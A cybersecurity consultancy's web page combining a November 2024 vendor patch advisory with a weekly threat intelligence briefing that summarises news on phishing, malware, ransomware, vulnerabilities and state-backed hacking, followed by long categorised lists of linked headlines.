High-Severity Vulnerabilities Patched in Zoom, Chrome - SecurityWeek
Citrix, Fortinet Patch High-Severity Vulnerabilities - SecurityWeek
WordPress Security Plugin Vulnerability Endangers 4 Million+ Sites
High-severity Fortinet VPN flaw allows privilege escalation • The Register
CISA Flags Two Actively Exploited Palo Alto Flaws; New RCE Attack Confirmed
D-Link won’t fix critical flaw affecting 60,000 older NAS devices
Google Chrome Warning—New Drive-By Cyber Attack, No 0-Day Needed
Chipmaker Patch Tuesday: Intel Publishes 44 and AMD Publishes 8 New Advisories - SecurityWeek
High-Severity Flaw in PostgreSQL Allows Hackers to Exploit Environment Variables
Unpatched Flaw in Legacy D-Link NAS Devices Exploited Days After Disclosure - SecurityWeek
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness; linking to or reposting external content does not endorse any service or product, and we are not responsible for the security of external links.
Black Arrow Cyber Advisory 13 November 2024 – Microsoft, Ivanti, Adobe, Fortinet, Citrix, AMD, Intel, Chrome and Zoom Security Updates
Executive summary
Alongside Microsoft's November Patch Tuesday, several vendors—including Ivanti, Adobe, Fortinet, Citrix, Intel, AMD, Google, and Zoom—have released security updates to address vulnerabilities across their product ranges. Microsoft's updates rectify 91 security issues, including four zero-day vulnerabilities, two of which are being actively exploited. Ivanti has issued updates for Endpoint Manager, Avalanche, Connect Secure, and Security Access Client, addressing multiple vulnerabilities rated as 'critical', 'high', and 'medium'. Adobe's patches tackle 48 security issues affecting Commerce, InDesign, Photoshop, Illustrator, and Substance 3D Painter. Fortinet has released updates for several products, including FortiOS, to remediate 'high' rated vulnerabilities. Citrix has provided security updates for various products such as Virtual Apps, Desktops, and Netscaler. Intel has issued 44 security advisories covering a variety of products. AMD has released eight advisories relating to incorrect default permissions in various software utilities. Lastly, Google has updated Chrome and Zoom has released updates, both addressing multiple 'high' severity security issues.
What’s the risk to me or my business?
The actively exploited vulnerabilities could allow an attacker to compromise the confidentiality, integrity and availability of the affected applications and the organisation's data on the affected systems.
What can I do?
Black Arrow recommends applying the available security updates for all supported versions of products that have been impacted by the various vulnerabilities. The updates should be applied as soon as possible for actively exploited vulnerabilities and for all other vulnerabilities that have a critical or high severity rating.
Microsoft
Further details on specific updates within this Microsoft Patch Tuesday can be found here:
https://msrc.microsoft.com/update-guide/releaseNote/2024-Nov
Ivanti
Further details on specific updates across affected Ivanti products can be found here:
Adobe
Further details of the vulnerabilities in affected Adobe products can be found here under ‘Recent bulletins and advisories’:
https://helpx.adobe.com/security/security-bulletin.html
Fortinet
Further details of the vulnerabilities in affected Fortinet products can be found here:
https://www.fortiguard.com/psirt/FG-IR-23-396
https://www.fortiguard.com/psirt/FG-IR-23-475
https://www.fortiguard.com/psirt/FG-IR-24-144
https://www.fortiguard.com/psirt/FG-IR-24-199
Citrix
Further details of the vulnerabilities in affected Citrix products can be found here:
Intel
Further details of the vulnerabilities in affected Intel products can be found here:
https://www.intel.com/content/www/us/en/security-center/default.html
AMD
Further details of the vulnerabilities in affected AMD products can be found here:
https://www.amd.com/en/resources/product-security.html
Chrome
Further details of the vulnerabilities in Google Chrome can be found here:
https://chromereleases.googleblog.com/2024/11/stable-channel-update-for-desktop_12.html
Zoom
Further details of the vulnerabilities in Zoom can be found here:
https://www.zoom.com/en/trust/security-bulletin/?cms_guid=false&lang=en-US
Black Arrow Cyber Threat Intelligence Briefing 08 November 2024
-Fake Copyright Infringement Emails Spread Rhadamanthys Malware
-Use Public Wi-Fi? You Might Not Want to After You Read This
-New MacOS Malware Linked to North Korean Hackers
-Disaster Recovery Planning is Key in the Modern-Day Business Environment
-The Biggest Underestimated Security Threat of Today? Advanced Persistent Teenagers
-Ransomware Attacks Hit Record Levels in 2024 Despite Law Enforcement Crackdowns
-The West Must Respond to Russia’s Rapidly Escalating Hybrid Warfare
-China’s Elite Hackers Expand Target List to European Union
-How Early-Stage Companies Can Go Beyond Cyber Security Basics
-How AI Will Shape the Next Generation of Cyber Threats
-Cyber Security Trends and Tips for Small and Medium Businesses to Stay Protected
-What Are the Key Threats to Global National Security?
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
Fake Copyright Infringement Emails Spread Rhadamanthys Malware
Check Point Research has identified a widespread phishing campaign targeting hundreds of organisations globally with fake copyright infringement emails. These emails deploy Rhadamanthys, a sophisticated cyber security threat that steals sensitive data, including cryptocurrency wallet information. The attackers impersonate brands mainly from the technology and media sectors, with nearly 70% of fake emails appearing to come from these industries. They exploit fears of copyright violation to prompt downloads of malicious files. The malware uses advanced techniques, such as embedding itself in large files to evade detection. Organisations are advised to strengthen phishing defences and monitor for unusual file downloads to mitigate this risk.
Use Public Wi-Fi? You Might Not Want to After You Read This
A recent survey found that nearly half of internet users connect to public Wi-Fi networks without verifying their legitimacy, with one in four experiencing security issues as a result. Cyber criminals exploit these unsecured networks to steal sensitive data like passwords and banking information. Experts highlight that despite warnings, convenience often outweighs caution, putting both individuals and organisations at risk of data breaches and identity theft. The report underscores the need for businesses to educate employees on the dangers of public Wi-Fi and to adopt secure practices such as using VPNs to protect sensitive information.
New MacOS Malware Linked to North Korean Hackers
Security researchers have identified new macOS malware linked to a North Korean hacking group targeting cryptocurrency businesses. The malware, named "Hidden Risk", is distributed through phishing emails masquerading as cryptocurrency news articles. Recipients are tricked into downloading a malicious program that runs on both Intel and Apple silicon Macs. The program was mistakenly notarised by Apple, allowing it to bypass security measures, but this approval has since been revoked. The malware creates a backdoor into the system, enabling hackers to execute commands and install additional payloads. The campaign is believed to have started in July and is attributed to the BlueNoroff group.
Disaster Recovery Planning is Key in the Modern-Day Business Environment
A recent survey has found that 78% of senior IT professionals reported data loss due to system failure, human error, or cyber attack in the past year, highlighting that protective measures are often breached. Yet only 54% are confident in their ability to recover data and minimise downtime after a disaster. Nearly 40% cite a lack of in-house technical expertise, 29% point to insufficient investment, and 28% note a lack of senior support as barriers to recovery planning. With incidents including a recent global outage costing businesses up to $1.5 billion, prioritising disaster recovery planning is critical for organisational resilience.
The Biggest Underestimated Security Threat of Today? Advanced Persistent Teenagers
Security experts have identified that financially motivated teenage hackers, termed "advanced persistent teenagers", are emerging as a significant cyber security threat. Organisations have suffered major data breaches and paid substantial ransoms due to these attacks, which often exploit social engineering tactics like phishing emails and impersonating helpdesk staff. Despite their youth, these hackers demonstrate capabilities once limited to nation states. Experts emphasise that insider threats and identity-related vulnerabilities are now among the biggest concerns, highlighting the need for improved identity and access management and a better understanding of the human element in cyber security.
Ransomware Attacks Hit Record Levels in 2024 Despite Law Enforcement Crackdowns
A cyber security expert noted that this year saw four eight-figure payments due to successful ransomware attacks, including a $22 million payment by a major health tech company. Data-theft-only attacks have risen by 30%, as some threat actors decide not to encrypt their victims’ systems and instead focus only on data theft. While authorities have disrupted significant ransomware operations, active groups have increased by 30% year-over-year, with 31 new groups emerging. There is a growing debate on banning ransom payments to deter these escalating cyber attacks.
The West Must Respond to Russia’s Rapidly Escalating Hybrid Warfare
Recent reports reveal that Russia is intensifying its hybrid warfare against the West. NATO Secretary General Mark Rutte highlighted a surge in cyber attacks, disinformation campaigns, and industrial sabotage across allied territories. These threats have expanded beyond Ukraine, affecting Western Europe and even the Arctic region. Despite reduced reliance on Russian energy, several EU countries remain vulnerable due to ongoing dependencies. The Kremlin is also exploiting non-traditional media and supporting populist movements to destabilise democracies. This escalating situation underscores the urgent need for Western governments and security services to collaborate in countering these multifaceted threats.
China’s Elite Hackers Expand Target List to European Union
Cyber security software provider ESET reports that China's elite government-backed hackers are expanding their targets to include the European Union. The report highlights that groups like MirrorFace, traditionally focused on Japan, are now targeting EU organisations. Despite this shift, motivations may remain Japan-centric, as spearphishing emails relate to events like EXPO 2025 in Osaka. The use of legitimate tools such as SoftEther VPN by these hackers is a growing concern, allowing them to blend into normal network traffic. ESET advises organisations to treat unexpected deployments of such tools as suspicious, emphasising the need for heightened vigilance.
How Early-Stage Companies Can Go Beyond Cyber Security Basics
Businesses are confronting increasingly sophisticated cyber threats, with phishing scams, zero-day vulnerabilities, and ransomware attacks on the rise. While compliance frameworks like GDPR and PCI DSS provide a foundation, they are insufficient alone, as they may not keep pace with evolving cyber criminal tactics. Many organisations risk a false sense of security by focusing solely on compliance, often engaging in procedural tick-box exercises rather than enhancing their security posture. To mitigate risks, organisations must adopt proactive, dynamic, risk-based security strategies, including layered defences, employee training, and robust incident response plans.
How AI Will Shape the Next Generation of Cyber Threats
Advancements in AI are significantly lowering the barrier to entry for cyber attackers. As AI-powered attack tools become accessible and packaged as user-friendly products on the dark web, even those without technical expertise can launch sophisticated cyber attacks. This shift greatly widens the pool of potential attackers beyond traditional threats, and highlights that organisations must adopt AI-powered defences to stay ahead. Ethical concerns also arise in deploying AI for cyber security, especially regarding data privacy and automated responses. Over the next five to ten years, AI-driven threats are expected to evolve significantly, introducing entirely new types of attacks.
Cyber Security Trends and Tips for Small and Medium Businesses to Stay Protected
Microsoft highlights that cyber attacks are increasingly affecting SMBs, with 31% having experienced incidents like ransomware and phishing. These attacks cost SMBs up to $7 million, impacting finances and reputation. 94% recognise cyber security’s importance, and over 70% work with specialists to manage their security. AI’s rise increases security needs, with 81% of SMBs acknowledging this. Many SMBs plan to boost cyber security spending; hybrid work also poses challenges, with 68% finding secure data access difficult for remote workers.
What Are the Key Threats to Global National Security?
A recent analysis identifies cyber security threats as the foremost concern for nations leveraging digital technologies, with cyber attacks increasingly targeting critical infrastructure. Climate change is another pressing issue, causing resource shortages and contributing to conflicts, with over two in five regions facing climate-induced migration. Bioterrorism also poses significant risks, yet nearly a third of countries have not invested adequately in public health preparedness. Economic espionage is impacting key sectors like technology and defence, and the ongoing threat of nuclear proliferation remains a major global security challenge.
Sources:
https://inews.co.uk/inews-lifestyle/public-wifi-wont-want-to-read-3348687
https://uk.pcmag.com/security/155250/new-macos-malware-linked-to-north-korean-hackers
https://www.techspot.com/news/105399-ransomware-attacks-set-rise-record-levels-2024-despite.html
https://cyberscoop.com/china-apt-eset-target-typhoon-mirrorface/
https://cyberscoop.com/cybersecurity-for-startups-early-stage-companies/
https://www.helpnetsecurity.com/2024/11/07/buzz-hillestad-prismatic-ai-driven-attacks/
https://www.itsecurityguru.org/2024/11/01/what-are-the-key-threats-to-global-national-security/
Governance, Risk and Compliance
7 cyber security trends for small and medium businesses | Microsoft Security Blog
CISO Top 10 Priorities for Q3 2024: Navigating Cyber Security's Evolving Challenges | SC Media
Disaster recovery planning is key in the modern-day business environment
Cyber security in crisis: Are we ready for what's coming? - Help Net Security
IT Security Centralization Makes Industrial Spies Profitable
How Cyber Security Training Must Adapt to a New Era of Threats - Security Boulevard
Chief risk storyteller: How CISOs are developing yet another skill | CSO Online
Threats
Ransomware, Extortion and Destructive Attacks
Cyber insurers would not welcome ban on ransomware payments :: Insurance Day
GoZone ransomware accuses and threatens victims - Help Net Security
RansomHub dethrones LockBit as top ransomware cartel | Cybernews
Iranian Threat Actors Ramp Up Ransomware, Cyber Activity
Ransomware attacks caused prolonged disruptions in October | TechTarget
Police Doxing of Criminals Raising Ransomware-Attack Stakes
Meet Interlock — The new ransomware targeting FreeBSD servers
Cyber attack disrupts classes at Irish technology university
Ransomware Victims
Devon school 'blackmailed' by hackers in cyber-attack - BBC News
Schneider Electric attackers demand ransom paid in baguettes • The Register
Ransomware Group Demands Payment in French Baguettes
Ransomware Attack Disrupts Georgia Hospital's Access to Health Records - SecurityWeek
Hacker Claims to Leak Nokia Source Code - InfoRiskToday
California court suffering from tech outages after cyber attack
Ransomware attack costs Microchip Technology over $21M | SC Media
Phishing & Email Based Attacks
Businesses Worldwide Targeted in Large-Scale ChatGPT Phishing Campaign - SecurityWeek
Dangerous new phishing campaign infects Windows devices with malicious Linux VM | TechRadar
Beware of phishing emails delivering backdoored Linux VMs! - Help Net Security
Fake Copyright Infringement Emails Spread Rhadamanthys
US Sentences Nigerian to 26 Years in Prison for Stealing Millions Through Phishing - SecurityWeek
DocuSign's Envelopes API abused to send realistic fake invoices
Cyber Criminals Exploit DocuSign APIs to Send Fake Invoices - Infosecurity Magazine
Large-Scale Phishing Campaign Exposed Using New Version Of Rhadamanthys Malware
Phishing Emails and Spam Are Similar, but There Are 5 Key Differences
Gmail Users Beware—Link Hovering Attacks On The Up
Gmail 2FA Cyber Attacks—Open Another Account Before It’s Too Late
Scammers Target Starlink Users With Elaborate Phishing Scheme
Other Social Engineering
LastPass warns of fake support centers trying to steal customer data
Fake Copyright Infringement Emails Spread Rhadamanthys
Malware operators use copyright notices to lure in businesses | SC Media
Advanced Variant Of FakeCall Malware Targets Mobile Users
FBI recovers just $8M after crypto scam crashes Kansas bank • The Register
Things you should know about ‘digital arrest’ scams! - The Hindu BusinessLine
Artificial Intelligence
The deepfake threat to CEOs | Fortune
How AI will shape the next generation of cyber threats - Help Net Security
Businesses Worldwide Targeted in Large-Scale ChatGPT Phishing Campaign - SecurityWeek
Experts warn some ChatGPT models can be hacked to launch deepfake scams | TechRadar
ChatGPT-4o can be used for autonomous voice-based scams
AI threats dictate a return to Human Intelligence | Cybernews
Defenders Outpace Attackers in AI Adoption - Infosecurity Magazine
OWASP Releases AI Security Guidance
Why Cyber Criminals Are Not Necessarily Embracing AI | HackerNoon
Inside Iran's Cyber Playbook: AI, Fake Hosting, and Psychological Warfare
Trump plans to dismantle Biden AI safeguards after victory - Ars Technica
2FA/MFA
Google Cloud to Mandate Multifactor Authentication by 2025 - Infosecurity Magazine
Gmail 2FA Cyber Attacks—Open Another Account Before It’s Too Late
Malware
New Malware Campaign Targets Windows Users Through Gaming Apps
Hackers increasingly use Winos4.0 post-exploitation kit in attacks
Industrial companies in Europe targeted with GuLoader - Help Net Security
5 Most Common Malware Techniques in 2024
MacOS under attack by crypto thieves: malicious app disguises itself as PDF | Cybernews
New SteelFox malware hijacks Windows PCs using vulnerable driver
New MacOS Malware Linked to North Korean Hackers
Microsoft services exploited for stealthy malware deployment | SC Media
Large-Scale Phishing Campaign Exposed Using New Version Of Rhadamanthys Malware
Typosquat campaign impersonates 287+ popular npm packages • The Register
Cloudy With a Chance of RATs: Unveiling APT36 and the Evolution of ElizaRAT - Check Point Research
Bots/Botnets
Microsoft reveals major Chinese botnet is attacking users across the world | TechRadar
Microsoft credentials pilfered by APT Storm via botnet spray-and-pray router attack | SC Media
Organisations are fighting a losing battle against advanced bots | TechRadar
Mobile
Advanced Variant Of FakeCall Malware Targets Mobile Users
New Android Banking Malware 'ToxicPanda' Targets Users with Fraudulent Money Transfers
Dangerous Android banking malware looks to trick victims with fake money transfers | TechRadar
Here's What I Do Whenever I Receive a Scam Message on WhatsApp
What Telegram’s recent policy shift means for cyber crime
Mobile & IoT Security Requires More Industry Attention
How I Spot Smishing Texts Easily (and You Can, Too)
Denial of Service/DoS/DDoS
UK Council Sites Recover Following Russian DDoS Blitz - Infosecurity Magazine
DDoS site Dstat.cc seized and two suspects arrested in Germany
UK councils bat away DDoS barrage from Putin fanboys • The Register
Cyber attack disrupts classes at Irish technology university
Internet of Things – IoT
IoT Security Failures Can Be Sh*tty - Security Boulevard
Iranian APT Targets IP Cameras, Extends Attacks Beyond Israel
Chinese Air Fryers May Be Spying on Consumers, Which? Warns - Infosecurity Magazine
Mobile & IoT Security Requires More Industry Attention
Data Breaches/Leaks
Recovering From a Breach: 4 Steps Every Organisation Should Take - Security Boulevard
Telecoms company Magnet+ investigating possible cyber attack – The Irish Times
Identity-related data breaches cost more than average incidents - Help Net Security
Nokia investigates breach after hacker claims to steal source code
Scissor-maker Fiskars sliced by hackers | Cybernews
Domestic abuse victim’s home address leaked to ex-partner after data breach | The Independent
210,000 Impacted by Saint Xavier University Data Breach - SecurityWeek
Organised Crime & Criminal Actors
Operation Synergia II sees Interpol swoop on cyber crims • The Register
Massive Nigerian Cyber Crime Bust Sees 130 Arrested - Infosecurity Magazine
Interpol operation nets 41 arrests, takedown of 22,000 malicious IPs
Cyber Threats Increase as Russia, China Train New Criminals - Africa Defense Forum
The biggest underestimated security threat of today? Advanced persistent teenagers | TechCrunch
Inside the Massive Crime Industry That’s Hacking Billion-Dollar Companies | WIRED
Hacker Said to Be Behind Breach of Snowflake (SNOW) Customers Arrested - Bloomberg
How to Defend Against Alleged Snowflake Attacker… | Intel 471
What Telegram’s recent policy shift means for cyber crime
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
MacOS under attack by crypto thieves: malicious app disguises itself as PDF | Cybernews
FBI recovers just $8M after crypto scam crashes Kansas bank • The Register
Insider Risk and Insider Threats
FBI arrested former Disney World employee for hacking computer menus and mislabeling allergy info
Oh, the Humanity! How to Make Humans Part of Cyber Security
Insurance
Cyber insurers would not welcome ban on ransomware payments :: Insurance Day
Supply Chain and Third Parties
Banks urged to improve resilience to IT meltdowns • The Register
Supply Chain Attack Uses Smart Contracts for C2 Ops - Infosecurity Magazine
New Report from BlueVoyant Shows Progress in Third-Party Cyber Risk Management, But Breaches Persist
The State of Supply Chain Defence in 2024 Report
Serco, DHL among firms affected by Microlise cyber attack | ITPro
Cloud/SaaS
The future of cloud computing: Top trends and predictions | TechTarget
5 SaaS Misconfigurations Leading to Major Fu*%@ Ups
Google Cloud to Mandate Multifactor Authentication by 2025 - Infosecurity Magazine
Microsoft 365 security blind spots: Is your business exposed? - Partner Content - Security - iTnews
Outages
Banks urged to improve resilience to IT meltdowns • The Register
Identity and Access Management
Identity-related data breaches cost more than average incidents - Help Net Security
Encryption
“Q Day” Is Coming: Is the World Prepared? - Centre for International Governance Innovation
Quantum Has Landed, So Now What?
Linux and Open Source
Dangerous new phishing campaign infects Windows devices with malicious Linux VM | TechRadar
Beware of phishing emails delivering backdoored Linux VMs! - Help Net Security
Meet Interlock — The new ransomware targeting FreeBSD servers
Passwords, Credential Stuffing & Brute Force Attacks
Microsoft Warns of Chinese Botnet Exploiting Router Flaws for Credential Theft
Microsoft credentials pilfered by APT Storm via botnet spray-and-pray router attack | SC Media
A Hacker's Guide to Password Cracking
Okta’s ‘secure by design’ pledge suffers a buggy setback | CSO Online
Social Media
South Korea fines Meta about $15 mln over collection of user data | Reuters
Canada Orders TikTok to Shut Down Canadian Operations Over Security Concerns
Malvertising
NCSC Publishes Tips to Tackle Malvertising Threat - Infosecurity Magazine
Training, Education and Awareness
How Cyber Security Training Must Adapt to a New Era of Threats - Security Boulevard
Regulations, Fines and Legislation
Banks urged to improve resilience to IT meltdowns • The Register
The NIS 2 Era Is Here: Are You Compliance-Ready? | Goodwin - JDSupra
Government-backed cyber security has a long way to go, warns Arctic Wolf
Apple could face EU's first-ever DMA fine as soon as this month - 9to5Mac
Exploring DORA: How to manage ICT incidents and minimize cyber threat risks
HIPAA Not ‘Strong Enough’ for Health Care’s Cyber Security Needs
South Korea fines Meta about $15 mln over collection of user data | Reuters
Biden administration prepares second executive order on cyber security | SC Media
Germany drafts law to protect researchers who find security flaws
Trump plans to dismantle Biden AI safeguards after victory - Ars Technica
Combating Cyber Crime: What to Expect From Trump Presidency?
Models, Frameworks and Standards
The NIS 2 Era Is Here: Are You Compliance-Ready? | Goodwin - JDSupra
Exploring DORA: How to manage ICT incidents and minimize cyber threat risks
OWASP Releases AI Security Guidance
NIST CSF 2.0 Critical - Security Boulevard
Data Protection
Consumer privacy risks of data aggregation: What should organisations do? - Help Net Security
South Korea fines Meta about $15 mln over collection of user data | Reuters
Careers, Working in Cyber and Information Security
24% of CISOs actively looking to leave their jobs | CSO Online
A grassroots movement to tackle cyber skills gap | Professional Security Magazine
UK Cyber Security Wages Soar Above Inflation as Stress Levels Rise - Infosecurity Magazine
Proactive Ways To Bridge The Cyber Security Talent Gap
How Playing Cyber Games Can Help You Get Hired
Keep Learning or Keep Losing: There's No Finish Line
US Coast Guard's New Cyber Units: A Game Changer for National Security - ClearanceJobs
Want to attract diverse cyber talent? Go beyond the same-old recruiting techniques | SC Media
MoD seeks leader for ‘defensive cyber operations’ – PublicTechnology
How CISOs can turn around low-performing cyber pros | CSO Online
Law Enforcement Action and Take Downs
FBI arrested former Disney World employee for hacking computer menus and mislabeling allergy info
Operation Synergia II sees Interpol swoop on cyber crims • The Register
Massive Nigerian Cyber Crime Bust Sees 130 Arrested - Infosecurity Magazine
Interpol operation nets 41 arrests, takedown of 22,000 malicious IPs
DDoS site Dstat.cc seized and two suspects arrested in Germany
FBI Seeks Public Help to Identify Chinese Hackers Behind Global Cyber Intrusions
Hacker Said to Be Behind Breach of Snowflake (SNOW) Customers Arrested - Bloomberg
How to Defend Against Alleged Snowflake Attacker… | Intel 471
Gov't IT contractors arrested for defrauding the feds • The Register
US Sentences Nigerian to 26 Years in Prison for Stealing Millions Through Phishing - SecurityWeek
FBI recovers just $8M after crypto scam crashes Kansas bank • The Register
Police Doxing of Criminals Raising Ransomware-Attack Stakes
Misinformation, Disinformation and Propaganda
Russian disinformation campaign active ahead of 2024 US election
US Says Russia Behind Fake Haitian Voters Video - Infosecurity Magazine
CISA: U.S. election disinformation peddled at massive scale | TechTarget
Misinformation is Ruining our Elections. Here’s How we can Rescue Them. - Security Boulevard
US warns of Russia and Iran’s disinformation campaigns as election day unfolds
False bomb threats only blemish on Election Day voting process
Russian Fake News and Bomb Threats Target Election Day Votes
Here are the post-election disinfo threats experts are watching for
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
IT Security Centralization Makes Industrial Spies Profitable
The West must respond to Russia’s rapidly escalating hybrid warfare - Atlantic Council
What are the key Threats to Global National Security? - IT Security Guru
Lord Harries links nuclear to cyber threats
Nation State Actors
Cyber Threats Increase as Russia, China Train New Criminals - Africa Defense Forum
China
Microsoft reveals major Chinese botnet is attacking users across the world | TechRadar
Microsoft Warns of Chinese Botnet Exploiting Router Flaws for Credential Theft
Chinese APTs Cash In on Years of Edge Device Attacks
Thousands of hacked TP-Link routers used in years-long account takeover attacks - Ars Technica
Sophos Warns Chinese Hackers Are Becoming Stealthier - Infosecurity Magazine
NCSC Details ‘Pygmy Goat’ Backdoor Planted on Hacked Sophos Firewall Devices - SecurityWeek
Microsoft credentials pilfered by APT Storm via botnet spray-and-pray router attack | SC Media
China's elite hackers expand target list to European Union | CyberScoop
China-Aligned MirrorFace Hackers Target EU Diplomats with World Expo 2025 Bait
Misinformation is Ruining our Elections. Here’s How we can Rescue Them. - Security Boulevard
China's Volt Typhoon breached Singtel, reports say • The Register
Chinese Group Accused of Hacking Singtel in Telecom Attacks - Bloomberg
FBI Seeks Public Help to Identify Chinese Hackers Behind Global Cyber Intrusions
Chinese Air Fryers May Be Spying on Consumers, Which? Warns - Infosecurity Magazine
Canada Orders TikTok to Shut Down Canadian Operations Over Security Concerns
Russia
The West must respond to Russia’s rapidly escalating hybrid warfare - Atlantic Council
N Korea may receive tech in exchange for military support • The Register
CISA: US election disinformation peddled at massive scale | TechTarget
Misinformation is Ruining our Elections. Here’s How we can Rescue Them. - Security Boulevard
Cyber attack sparks extra security at Portsmouth council - BBC News
UK Council Sites Recover Following Russian DDoS Blitz - Infosecurity Magazine
Russian disinformation campaign active ahead of 2024 US election
US Says Russia Behind Fake Haitian Voters Video - Infosecurity Magazine
False bomb threats only blemish on Election Day voting process
Russian Fake News and Bomb Threats Target Election Day Votes
Here are the post-election disinfo threats experts are watching for
Cyber Threats Increase as Russia, China Train New Criminals - Africa Defense Forum
1 Million Cyber Attacks Made On Montco Election, Mainly From Russia | Norristown, PA Patch
Iran
CISA: U.S. election disinformation peddled at massive scale | TechTarget
Misinformation is Ruining our Elections. Here’s How we can Rescue Them. - Security Boulevard
Iranian Threat Actors Ramp Up Ransomware, Cyber Activity
Iranian APT Targets IP Cameras, Extends Attacks Beyond Israel
Here are the post-election disinfo threats experts are watching for
Inside Iran's Cyber Playbook: AI, Fake Hosting, and Psychological Warfare
North Korea
N Korea may receive tech in exchange for military support • The Register
Tools and Controls
Banks urged to improve resilience to IT meltdowns • The Register
Disaster recovery planning is key in the modern-day business environment
AI threats dictate a return to Human Intelligence | Cybernews
What is Unified Threat Management (UTM)? | Definition from TechTarget
Recovering From a Breach: 4 Steps Every Organisation Should Take - Security Boulevard
Google Says Its AI Found SQLite Vulnerability That Fuzzing Missed - SecurityWeek
Google Cloud to Mandate Multifactor Authentication by 2025 - Infosecurity Magazine
New cyber security advisory highlights defence-in-depth strategies
Oh, the Humanity! How to Make Humans Part of Cyber Security
How to Win at Cyber by Influencing People
Security Assessment Reports: A Complete Overview - Security Boulevard
The human factor in cyber resilience | UKAuthority
Typosquat campaign impersonates 287+ popular npm packages • The Register
Scotland’s Digital Office highlights tabletop cyber security exercises | UKAuthority
Defenders Outpace Attackers in AI Adoption - Infosecurity Magazine
4 Main API Security Risks Organisations Need to Address
The ins and outs of threat emulation | TechRadar
Navigating the evolving landscape of cyber risk management
Germany drafts law to protect researchers who find security flaws
What is a Cyber Range? - Security Boulevard
Okta’s ‘secure by design’ pledge suffers a buggy setback | CSO Online
Effective Phishing Exercises: How To Plan, Execute And Follow Up
Microsoft 365 security blind spots: Is your business exposed? - Partner Content - Security - iTnews
Other News
Cyber security in crisis: Are we ready for what's coming? - Help Net Security
CISO Top 10 Priorities for Q3 2024: Navigating Cyber Security's Evolving Challenges | SC Media
The ironic vulnerability: why insurers are prime targets for cyber attacks
Cyber attack disrupts classes at Irish technology university
Public sector cyber break-ins: Our money, our right to know • The Register
'Unauthorized activity' downs Washington's court systems • The Register
The Internet's Defenders Are Running Out of Money—And We're All at Risk | IBTimes
How to Win at Cyber by Influencing People
Scotland’s Digital Office highlights tabletop cyber security exercises | UKAuthority
How early-stage companies can go beyond cyber security basics | CyberScoop
How to Outsmart Stealthy E-Crime and Nation-State Threats
Cyber Trends: Keep an Eye on Critical Infrastructure Sectors
Five ways cyber criminals target healthcare and how to stop them | ITPro
JPMorgan CISO says three trends play a role in how he protects the banking giant | Fortune
Attackers Breach IT-Based Networks Before Jumping to ICS/OT Systems
Don't search for information on cats at work — you could be at risk of being hacked | TechRadar
Combating Cyber Crime: What to Expect From Trump Presidency?
Facing Growing Threats, Space Industry Expands Its Cyber Warning Center
Governments are facing a huge surge in cyber attacks | TechRadar
Cyber Threats That Could Impact the Retail Industry This Holiday Season (and What to Do About It)
Cyber attack on American Water: A warning to critical infrastructure
Vulnerability Management
Vulnerabilities
Microsoft SharePoint RCE bug exploited to breach corporate network
Worrying WordPress plugin security flaw could let hackers hijack your site | TechRadar
Okta vulnerability allowed accounts with long usernames to log in without a password
New SteelFox malware hijacks Windows PCs using vulnerable driver
Sophos Firewall hack on government network used an all-new custom malware | TechRadar
Cisco scores an (im)perfect CVSS 10 with critical Wi-Fi flaw • The Register
CISA warns of critical Palo Alto Networks bug exploited in attacks
Zero-Click Flaw Exposes Potentially Millions of Popular Storage Devices to Attack | WIRED
PfSense Stored XSS Vulnerability Leads To RCE Attacks, PoC Published
Synology Urges Patch for Critical Zero-Click RCE Flaw Affecting Millions of NAS Devices
Google Patches Two Android Vulnerabilities Exploited in Targeted Attacks - SecurityWeek
Okta’s ‘secure by design’ pledge suffers a buggy setback | CSO Online
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 01 November 2024
Black Arrow Cyber Threat Intelligence Briefing 01 November 2024:
-Banks and Regulators Warn of Rise in ‘Quishing’ QR Code Scams
-Russia Carrying Out Targeted Attacks In UK, Microsoft Warns
-Spoof Eventbrite Phishing Emails Lure in Victims in Major Attack
-Business Email Compromise Scams Dominate Q3 2024 Threats
-This Nasty Android Trojan is Hijacking Calls to Your Bank and Sending Them to Hackers
-What Military Wargames Can Teach About Cyber Security
-Businesses Expect Cyber Threats to Rise, but Aren’t Ready for Them
-The Overlooked Importance of Identifying the Riskiest Users
-Hackers Targeted a $12 Billion Cyber Security Company with a Deepfake of Its CEO. Here's Why Small Details Made It Unsuccessful.
